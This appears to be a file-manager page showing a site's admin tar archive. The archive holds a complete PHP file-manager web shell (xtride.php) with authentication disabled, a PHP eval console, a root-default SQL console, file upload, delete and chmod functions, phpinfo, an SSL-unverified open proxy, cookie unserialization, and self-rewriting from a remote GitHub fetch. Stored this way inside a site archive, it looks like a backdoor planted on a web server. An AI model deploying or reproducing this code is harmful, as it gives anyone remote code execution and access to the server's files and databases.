Файловый менеджер - Редактировать - /home/gqdcvggs/go.imators.com/admin.imators.com.tar
Назад
akcc.php 0000644 00000000000 15114726654 0006157 0 ustar 00 xtride.php 0000644 00000235135 15114726654 0006600 0 ustar 00 <?php /* PHP File manager ver 1.6 */ // Configuration — do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":""}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search": "Рекурсивный поиск","Mask":"Маска"}'; // end configuration // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.6; ini_set('display_errors', '1'); ini_set('display_startup_errors', '1'); error_reporting(E_ALL); //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/henriyzx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } function find_text_in_files($dir, $mask, $text) { $results = array(); if ($handle = opendir($dir)) { while (false !== ($entry = readdir($handle))) { if ($entry != "." && $entry != "..") { $path = $dir . "/" . $entry; if (is_dir($path)) { $results = array_merge($results, find_text_in_files($path, $mask, $text)); } else { if (fnmatch($mask, $entry)) { $contents = file_get_contents($path); if (strpos($contents, $text) !== false) { $results[] = str_replace('//', '/', $path); } } } } } closedir($handle); } return $results; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzBC/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCDJiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBzPEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0JroR+cQYYjIxh1hILCPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs0SBojk8naZGuyBzmULCAryIXkne